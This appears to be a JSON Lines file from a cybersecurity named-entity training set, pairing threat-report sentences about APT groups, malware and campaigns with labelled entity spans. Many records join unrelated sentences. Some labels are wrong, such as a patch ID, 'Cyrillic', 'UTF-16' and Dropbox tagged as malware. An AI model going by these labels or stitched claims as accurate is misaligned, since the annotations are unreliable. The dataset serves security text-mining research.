"info": {"id": "cyberner_stix_train_005596", "source": "cyberner_stix_train"}} {"text": "As you can see in the following screenshot , simply attempting to highlight the lines in which the DDE instructions reside does not display them .", "spans": {}, "info": {"id": "cyberner_stix_train_005597", "source": "cyberner_stix_train"}} {"text": "This mobile malware masquerades as legitimate , trusted postal service applications so that it can gain the users trust . 
The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 .", "spans": {"THREAT_ACTOR: attacker": [[126, 134]], "TOOL: delivered payloads": [[256, 274]], "THREAT_ACTOR: APT15": [[329, 334]], "ORGANIZATION: NCC Group": [[381, 390]]}, "info": {"id": "cyberner_stix_train_005598", "source": "cyberner_stix_train"}} {"text": "The command uses the echo command to write a large chunk of base64 encoded data to a text file named cmd.txt .", "spans": {"FILEPATH: cmd.txt": [[101, 108]]}, "info": {"id": "cyberner_stix_train_005599", "source": "cyberner_stix_train"}} {"text": "Symantec Security Response has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India .", "spans": {"ORGANIZATION: Symantec Security Response": [[0, 26]], "THREAT_ACTOR: Patchwork": [[56, 65]], "THREAT_ACTOR: Dropping Elephant": [[82, 99]], "ORGANIZATION: Rapid7": [[202, 208]], "MALWARE: KeyBoy": [[250, 256]], "ORGANIZATION: Microsoft": [[304, 313]], "MALWARE: MS12-060": [[344, 352]]}, "info": {"id": "cyberner_stix_train_005600", "source": "cyberner_stix_train"}} {"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . 
While Operation Emmental was able to bypass two-way authentication by tricking its victims into installing a fake app , we have not observed OSX_DOK.C doing this .", "spans": {"THREAT_ACTOR: Spring Dragon group": [[14, 33]], "VULNERABILITY: spearphish exploits": [[60, 79]], "TOOL: fake app": [[247, 255]], "MALWARE: OSX_DOK.C": [[279, 288]]}, "info": {"id": "cyberner_stix_train_005601", "source": "cyberner_stix_train"}} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . Starting in December 2014 , the criminal group began running keyloggers in the infected system .", "spans": {"MALWARE: GRIFFON": [[8, 15]], "MALWARE: keyloggers": [[186, 196]]}, "info": {"id": "cyberner_stix_train_005602", "source": "cyberner_stix_train"}} {"text": "Malwr.com observed this site in association with another sample that called out to mailsinfo.net – a host identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"DOMAIN: Malwr.com": [[0, 9]], "DOMAIN: mailsinfo.net": [[83, 96]], "MALWARE: KASPERAGENT": [[166, 177]], "MALWARE: MICROPSIA": [[182, 191]]}, "info": {"id": "cyberner_stix_train_005603", "source": "cyberner_stix_train"}} {"text": "The malicious application sends a request to choose a network account , a specific account that can only be processed by authentication services exported by the malicious application . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses . Dexphot usually extracts the decompressed files to the target system ’s Favorites folder . 
The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"ORGANIZATION: accounting departments": [[276, 298]], "ORGANIZATION: businesses": [[310, 320]], "MALWARE: Dexphot": [[323, 330]], "TOOL: Favorites folder": [[395, 411]]}, "info": {"id": "cyberner_stix_train_005604", "source": "cyberner_stix_train"}} {"text": "More details on this protection is available in the conclusion of the report .", "spans": {}, "info": {"id": "cyberner_stix_train_005605", "source": "cyberner_stix_train"}} {"text": "One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests .", "spans": {"TOOL: dropper": [[49, 56]], "THREAT_ACTOR: Clever Kitten": [[169, 182]]}, "info": {"id": "cyberner_stix_train_005606", "source": "cyberner_stix_train"}} {"text": "We also found a Windows version of the UnionCryptoTrader ( 0f03ec3487578cef2398b5b732631fec ) .", "spans": {"SYSTEM: Windows": [[16, 23]], "TOOL: UnionCryptoTrader": [[39, 56]], "FILEPATH: 0f03ec3487578cef2398b5b732631fec": [[59, 91]]}, "info": {"id": "cyberner_stix_train_005607", "source": "cyberner_stix_train"}} {"text": "Kaspersky found Zebrocy deploying a compiled Python script , which we call PythocyDbg , within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities . 
The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Zebrocy": [[16, 23]], "TOOL: Python script": [[45, 58]], "TOOL: PythocyDbg": [[75, 85]], "FILEPATH: st07383.en17.docx": [[271, 288]], "VULNERABILITY: CVE-2017-0001": [[339, 352]], "FILEPATH: SHIRIME": [[458, 465]]}, "info": {"id": "cyberner_stix_train_005608", "source": "cyberner_stix_train"}} {"text": "Sending C2-specified SMS messages to phone numbers in the victim ’ s contacts . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . This vbs is properly the macro executed by the macro engine of word . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[80, 90]], "THREAT_ACTOR: Threat actors": [[265, 278]]}, "info": {"id": "cyberner_stix_train_005609", "source": "cyberner_stix_train"}} {"text": "In later versions , another encryption layer is added using Curve25519 encryption . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . 
APT32 poses a threat to companies doing business or preparing to invest in Vietnam .", "spans": {"ORGANIZATION: ESET": [[97, 101]], "MALWARE: Okrum": [[114, 119]], "THREAT_ACTOR: APT32": [[262, 267]]}, "info": {"id": "cyberner_stix_train_005610", "source": "cyberner_stix_train"}} {"text": "Their similarity is made more apparent by looking at their naming method for downloadable files , domain structure of fake websites and other details of their deployment techniques , exemplified in figure 10 . APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . In our sample, after the malware sent the 0 action, the controller responded with an A record containing 24.125.10.140 . Future cybercriminal campaigns on social network platforms may not be so gentle .", "spans": {"THREAT_ACTOR: APT19": [[210, 215]], "ORGANIZATION: defense sector firms": [[241, 261]], "ORGANIZATION: Chinese dissident groups and other political target": [[264, 315]], "ORGANIZATION: financial targets": [[337, 354]], "ORGANIZATION: commercial targets in": [[365, 386]], "ORGANIZATION: pharmaceutical and": [[387, 405]], "ORGANIZATION: energy sectors": [[406, 420]], "IP_ADDRESS: 24.125.10.140": [[567, 580]], "TOOL: social network platforms": [[617, 641]]}, "info": {"id": "cyberner_stix_train_005611", "source": "cyberner_stix_train"}} {"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak . 
Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "THREAT_ACTOR: Turla": [[100, 105]], "TOOL: dropper": [[128, 135]], "MALWARE: JS/KopiLuwak": [[168, 180]], "ORGANIZATION: Group-IB": [[183, 191]], "TOOL: emails": [[233, 239]], "FILEPATH: malicious Microsoft Word attachment titled Договор.doc”": [[253, 308]], "FILEPATH: [Contract.doc]": [[309, 323]]}, "info": {"id": "cyberner_stix_train_005612", "source": "cyberner_stix_train"}} {"text": "The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge .", "spans": {"ORGANIZATION: oil and gas": [[4, 15]], "THREAT_ACTOR: Naikon": [[108, 114]], "ORGANIZATION: energy resources": [[210, 226]], "FILEPATH: module": [[280, 286]]}, "info": {"id": "cyberner_stix_train_005613", "source": "cyberner_stix_train"}} {"text": "Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as “ Mimikatz ” for lateral movement .", "spans": {"TOOL: USB": [[69, 72]], "TOOL: Mimikatz": [[123, 131]]}, "info": {"id": "cyberner_stix_train_005614", "source": "cyberner_stix_train"}} {"text": "The attackers send fake text messages to lure the victims to click on a malicious link . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . 
The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government .", "spans": {"THREAT_ACTOR: APT10": [[101, 106]], "ORGANIZATION: government": [[379, 389]]}, "info": {"id": "cyberner_stix_train_005615", "source": "cyberner_stix_train"}} {"text": "PLATINUM primarily targets its intended victims using spear phishing . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: Group-IB": [[81, 89]], "ORGANIZATION: banks": [[151, 156], [259, 264]], "ORGANIZATION: service provider": [[186, 202]], "ORGANIZATION: bank": [[219, 223]]}, "info": {"id": "cyberner_stix_train_005616", "source": "cyberner_stix_train"}} {"text": "ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . The newest campaign uses updated versions of Aumlib and Ixeshe . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"ORGANIZATION: Tibetan community": [[152, 169]], "TOOL: malware": [[239, 246]], "MALWARE: Aumlib": [[346, 352]], "MALWARE: Ixeshe": [[357, 363]]}, "info": {"id": "cyberner_stix_train_005617", "source": "cyberner_stix_train"}} {"text": "The steps implemented include : Load a URL in a WebView Run JavaScript in WebView Toggle WiFi state Toggle mobile data state Read/modify SMS inbox Solve captchas Captchas One of the more interesting states implements the ability to solve basic captchas ( obscured letters and numbers ) . 
Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud . The first thread is the “ communication ” thread . If executed successfully , LIGHTWORK provides the operator the following command - line output : Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis .", "spans": {"THREAT_ACTOR: Bahamut": [[299, 306]], "TOOL: communication": [[449, 462]], "MALWARE: LIGHTWORK": [[501, 510]]}, "info": {"id": "cyberner_stix_train_005618", "source": "cyberner_stix_train"}} {"text": "Wh1sks estimated that , between June and early August , the Shadow Brokers have made up to $88,000 in an alternative cryptocurrency called Monero . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2. This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP PROT 443 . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 . 
Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": {"ORGANIZATION: Wh1sks": [[0, 6]], "THREAT_ACTOR: Shadow Brokers": [[60, 74]], "ORGANIZATION: cryptocurrency": [[117, 131]], "ORGANIZATION: Booz Allen Hamilton": [[148, 167]], "ORGANIZATION: AhnLab": [[180, 186]], "TOOL: C2": [[253, 255], [477, 479]], "THREAT_ACTOR: Bisonal malware": [[300, 315]], "FILEPATH: Bisonal": [[385, 392], [945, 952]], "FILEPATH: Bisonal malware": [[570, 585]], "FILEPATH: sample": [[659, 665]], "FILEPATH: it's": [[788, 792]], "MALWARE: Cyrillic": [[793, 801]], "MALWARE: UTF-16": [[921, 927]], "TOOL: PDF": [[1032, 1035]]}, "info": {"id": "cyberner_stix_train_005619", "source": "cyberner_stix_train"}} {"text": "The “ boot ” module has placeholder classes for the entry points of the infected applications . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Not only is it harder to detect the malicious code while it ’s running , it ’s harder to find useful forensics after the process has stopped . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"MALWARE: Careto": [[125, 131]], "MALWARE: Domen toolkit": [[426, 439]], "TOOL: SolarMarker": [[542, 553]], "MALWARE: NetSupport RAT": [[569, 583]]}, "info": {"id": "cyberner_stix_train_005620", "source": "cyberner_stix_train"}} {"text": "The targeting of Chinese nationals may also be related to this campaign , but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group . 
KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine .", "spans": {"TOOL: Surveillance-As-A-Service": [[170, 195]], "THREAT_ACTOR: HANGOVER group": [[241, 255]], "MALWARE: KeyBoy": [[258, 264]]}, "info": {"id": "cyberner_stix_train_005621", "source": "cyberner_stix_train"}} {"text": "The Janus vulnerability , which allows the actor to replace any application with an infected version . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 . exe ( for extracting files from the password-protected ZIP archive ) , rundll32.exe ( for loading the loader DLL ) , schtasks.exe ( for scheduled tasks ) , powershell.exe ( for forced updates ) . User Execution : Malicious Link APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link .002 User Execution : Malicious File APT29 has used various forms of spearphishing attempting to get a user to open attachments , including , but not limited to , malicious Microsoft Word documents , .pdf , and .lnk files .", "spans": {"VULNERABILITY: Janus": [[4, 9]], "THREAT_ACTOR: Buhtrap": [[144, 151]], "FILEPATH: exe": [[201, 204]], "FILEPATH: rundll32.exe": [[272, 284]], "TOOL: DLL": [[310, 313]], "FILEPATH: schtasks.exe": [[318, 330]], "FILEPATH: powershell.exe": [[357, 371]], "THREAT_ACTOR: Malicious Link APT29": [[414, 434]], "THREAT_ACTOR: Malicious File APT29": [[550, 570]]}, "info": {"id": "cyberner_stix_train_005622", "source": "cyberner_stix_train"}} {"text": "The set of permissions required by Marcher according to the manifest is as follows : ∗ android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) ∗ android.permission.SEND_SMS ( send SMS messages ) ∗ android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) ∗ android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) ∗ 
android.permission.INTERNET ( communicate with the internet ) ∗ android.permission.VIBRATE The oldest sample we've seen up to now is from November 2013 . As our analysis demonstrates , ZxShell is an effective tool that can be ultimately used to steal user credentials and other highly valuable information . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {"MALWARE: Marcher": [[35, 42]], "MALWARE: ZxShell": [[548, 555]]}, "info": {"id": "cyberner_stix_train_005623", "source": "cyberner_stix_train"}} {"text": "This specific IP address is a critical piece of information that enables us to connect this attack to a spree of previous targeted campaigns .", "spans": {}, "info": {"id": "cyberner_stix_train_005624", "source": "cyberner_stix_train"}} {"text": "] it Firenze server4fi.exodus.connexxa [ . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly . Zavantazhyty means to load or download in Ukranian . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence ’s website .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[43, 53]], "TOOL: custom malware": [[64, 78]], "TOOL: tailormade credential gathering tools": [[93, 130]], "ORGANIZATION: Snort": [[270, 275]]}, "info": {"id": "cyberner_stix_train_005625", "source": "cyberner_stix_train"}} {"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . 
Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources .", "spans": {"MALWARE: CONFUCIUS_B": [[4, 15]], "TOOL: RTLO": [[104, 108]], "FILEPATH: attacks": [[141, 148]]}, "info": {"id": "cyberner_stix_train_005626", "source": "cyberner_stix_train"}} {"text": "There are several indicators ( see section \" trojan activity '' below ) that it is in its last stages of development , but it has the potential to be a serious threat . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[169, 180]], "ORGANIZATION: FireEye": [[240, 247]], "THREAT_ACTOR: APT37": [[294, 299]], "VULNERABILITY: zero-day": [[312, 320]], "TOOL: Adobe Flash": [[321, 332]], "VULNERABILITY: CVE-2018-4878": [[349, 362]], "MALWARE: DOGCALL": [[379, 386]], "MALWARE: malware": [[387, 394]]}, "info": {"id": "cyberner_stix_train_005627", "source": "cyberner_stix_train"}} {"text": "Instead , we feel the targeting of drug dealers was a new task for a subset of the Dukes group , possibly due to the drug trade ’s relevance to security policy issues .", "spans": {"THREAT_ACTOR: Dukes": [[83, 88]]}, "info": {"id": "cyberner_stix_train_005628", "source": "cyberner_stix_train"}} {"text": "It uses the same technique as it used to determine the offset to the mmap function . In March 2014 , the gang behind Potao started using a new infection vector . APT17 : 4c21336dad66ebed2f7ee45d41e6cada . 
The page hxxp://[c2_hostname]/groups / business - principles.html is used as an starting point for the attack .", "spans": {"TOOL: Potao": [[117, 122]], "TOOL: infection vector": [[143, 159]], "THREAT_ACTOR: APT17": [[162, 167]], "FILEPATH: 4c21336dad66ebed2f7ee45d41e6cada": [[170, 202]]}, "info": {"id": "cyberner_stix_train_005629", "source": "cyberner_stix_train"}} {"text": "Based on our observations of interactions in this channel , between May 2016 and June 2016 , malicious actors validated 2 , 987 cards from 62 countries , with the most coming from the U.S. (nearly half) , Brazil , and France . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"THREAT_ACTOR: actors": [[103, 109]], "THREAT_ACTOR: HELIX KITTEN actors": [[242, 261]], "ORGANIZATION: personnel": [[397, 406]]}, "info": {"id": "cyberner_stix_train_005630", "source": "cyberner_stix_train"}} {"text": "The original leak is no longer available on github.com , but a copy can be found here . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . The IXESHE campaign has been successfully executing targeted attacks since 2009 . 
As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"THREAT_ACTOR: The Lamberts": [[133, 145]], "ORGANIZATION: ITSec community": [[185, 200]], "ORGANIZATION: FireEye": [[236, 243]], "VULNERABILITY: zero day vulnerability": [[273, 295]], "VULNERABILITY: CVE-2014-4148": [[298, 311]], "THREAT_ACTOR: IXESHE": [[320, 326]], "ORGANIZATION: Google Analytics": [[401, 417]], "ORGANIZATION: CSP": [[436, 439]], "THREAT_ACTOR: attacker": [[499, 507]]}, "info": {"id": "cyberner_stix_train_005631", "source": "cyberner_stix_train"}} {"text": "5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive—or even destructive—event . Vydalyty means to remove or delete in Ukrainian . • None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"ORGANIZATION: Dragos": [[260, 266]], "THREAT_ACTOR: XENOTIME": [[306, 314]], "VULNERABILITY: CVE-2022 - 41080": [[507, 523]], "VULNERABILITY: CVE-2022 - 41082": [[528, 544]]}, "info": {"id": "cyberner_stix_train_005632", "source": "cyberner_stix_train"}} {"text": "It 's also raising eyebrows because of the connection with China , which has frequently sparred with the U.S. over cyber espionage . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . 
Daserf : f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 .", "spans": {"ORGANIZATION: Rapid7": [[133, 139]], "MALWARE: Dropbox": [[225, 232]], "MALWARE: Daserf": [[245, 251]], "FILEPATH: f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06": [[254, 318]]}, "info": {"id": "cyberner_stix_train_005633", "source": "cyberner_stix_train"}} {"text": "The code and functionality have changed numerous times ; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device . MuddyWater compiles various offensive Python scripts . Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government .", "spans": {"THREAT_ACTOR: MuddyWater": [[210, 220]], "TOOL: Python": [[248, 254]], "TOOL: scripts": [[255, 262]], "THREAT_ACTOR: Taidoor": [[265, 272]], "ORGANIZATION: Taiwanese government": [[360, 380]]}, "info": {"id": "cyberner_stix_train_005634", "source": "cyberner_stix_train"}} {"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: legitimate administration tools": [[15, 46]], "ORGANIZATION: education": [[288, 297]], "ORGANIZATION: energy": [[300, 306]], "ORGANIZATION: technology": [[311, 321]]}, "info": {"id": "cyberner_stix_train_005635", "source": "cyberner_stix_train"}} {"text": "As a result , CTU researchers were unable to ascertain the initial access vector .", "spans": {"ORGANIZATION: CTU": [[14, 17]]}, "info": {"id": "cyberner_stix_train_005636", "source": "cyberner_stix_train"}} {"text": "This Arabic-speaking group uses spear phishing attacks to infect target machines in the Middle East and North Africa with various Remote Access Trojans ( RATs ) .", "spans": {"TOOL: Remote Access Trojans": [[130, 151]], "TOOL: RATs": [[154, 158]]}, "info": {"id": "cyberner_stix_train_005637", "source": "cyberner_stix_train"}} {"text": "According to our data , 0.4 % of the websites visited by users of our products were compromised sites . attacks to a Chinese-speaking threat actor group called LuckyMouse . In this case , the launcher is much simpler . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": {"MALWARE: COSMICENERGY": [[230, 242]], "ORGANIZATION: Rostelecom - Solar": [[390, 408]], "ORGANIZATION: Russian cyber security company": [[413, 443]]}, "info": {"id": "cyberner_stix_train_005638", "source": "cyberner_stix_train"}} {"text": "First , based on information that is associated with the registered C & C domain , we identified the name of the registrant , along with further data like country and email address , as seen in Figure 8 . 
The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . SHA256 : eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 .", "spans": {"MALWARE: st07383.en17.docx": [[217, 234]], "VULNERABILITY: CVE-2017-0001": [[285, 298]], "MALWARE: SHIRIME": [[404, 411]], "FILEPATH: eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435": [[423, 487]]}, "info": {"id": "cyberner_stix_train_005639", "source": "cyberner_stix_train"}} {"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: social media": [[30, 42]], "TOOL: RATs": [[189, 193]], "TOOL: PupyRAT": [[202, 209]], "TOOL: Python": [[226, 232]], "FILEPATH: Stageless Meterpreter": [[257, 278]], "FILEPATH: Ext_server_stdapi.x64.dll”": [[287, 313]], "FILEPATH: Ext_server_extapi.x64.dll”": [[316, 342]], "FILEPATH: Ext_server_espia.x64.dll”": [[349, 374]]}, "info": {"id": "cyberner_stix_train_005640", "source": "cyberner_stix_train"}} {"text": "If this file is not present , it is recreated from a hardcoded encrypted array inside the body of the DLL .", "spans": {"TOOL: DLL": [[102, 105]]}, "info": {"id": "cyberner_stix_train_005641", "source": "cyberner_stix_train"}} {"text": "FireEye observed that BACKSWING , a malicious JavaScript profiling framework , was deployed to at least 54 legitimate sites starting as early as September 2016 . 
These emails included recruitment-themed lures and links to malicious HTML Application ( HTA ) files .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: profiling framework": [[57, 76]], "TOOL: emails": [[168, 174]], "TOOL: HTML Application": [[232, 248]], "TOOL: HTA": [[251, 254]]}, "info": {"id": "cyberner_stix_train_005642", "source": "cyberner_stix_train"}} {"text": "'' \" According to our statistics , as of today , there 're more than 500 , 000 Android devices infected by this bootkit in China in last six months . Where they exist , they often use grey market or pirated software . APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed . [ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": {"SYSTEM: Android": [[79, 86]], "TOOL: grey market": [[184, 195]], "TOOL: pirated software": [[199, 215]], "THREAT_ACTOR: APT1": [[218, 222]], "TOOL: email": [[251, 256]]}, "info": {"id": "cyberner_stix_train_005643", "source": "cyberner_stix_train"}} {"text": "The content of the HTTP POST data is telemetry data in a json format about the device the malware is running on . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . 
After the modification , Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"THREAT_ACTOR: APT38": [[118, 123]], "ORGANIZATION: news outlets": [[133, 145]], "ORGANIZATION: financial sector": [[175, 191]], "ORGANIZATION: financial institutions": [[273, 295]], "ORGANIZATION: Talos": [[446, 451]], "TOOL: Open Babel": [[517, 527]]}, "info": {"id": "cyberner_stix_train_005644", "source": "cyberner_stix_train"}} {"text": "Wmiexec — This publicly available tool uses WMI to create SYSTEM-level shells on remote hosts .", "spans": {"TOOL: Wmiexec": [[0, 7]], "TOOL: WMI": [[44, 47]]}, "info": {"id": "cyberner_stix_train_005645", "source": "cyberner_stix_train"}} {"text": "params : This command allows the malicious operator to change configuration parameters in the malware . MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . KHRAT : File Name : 8081.dll . The usage of the h and m parameters and its values local and net are very similar to arguments used by Conti .", "spans": {"THREAT_ACTOR: MuddyWater": [[104, 114]], "ORGANIZATION: defense entities": [[172, 188]], "MALWARE: KHRAT": [[221, 226]], "FILEPATH: 8081.dll": [[241, 249]], "THREAT_ACTOR: Conti": [[355, 360]]}, "info": {"id": "cyberner_stix_train_005646", "source": "cyberner_stix_train"}} {"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . 
On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times .", "spans": {"THREAT_ACTOR: Gallmaker": [[36, 45]], "TOOL: DDE protocol": [[70, 82]], "ORGANIZATION: fake ad agencies": [[261, 277]]}, "info": {"id": "cyberner_stix_train_005647", "source": "cyberner_stix_train"}} {"text": "The first malicious sample we identified ( 6843AE9EAC03F69DF301D024BFDEFC88 ) had the file name “ testproj.exe ”", "spans": {"FILEPATH: 6843AE9EAC03F69DF301D024BFDEFC88": [[43, 75]], "FILEPATH: testproj.exe": [[98, 110]]}, "info": {"id": "cyberner_stix_train_005648", "source": "cyberner_stix_train"}} {"text": "After that , it begins to harvest information stored on the device . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years .", "spans": {"THREAT_ACTOR: APT34": [[95, 100]], "VULNERABILITY: Microsoft Office vulnerability": [[122, 152]], "VULNERABILITY: CVE-2017-11882": [[153, 167]], "TOOL: POWRUNER": [[178, 186]], "TOOL: BONDUPDATER": [[191, 202]], "MALWARE: Truvasys": [[230, 238]]}, "info": {"id": "cyberner_stix_train_005649", "source": "cyberner_stix_train"}} {"text": "Kaspersky Internet Security for Android and the Sberbank Online app securely protect users against attacks by this Trojan . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . 
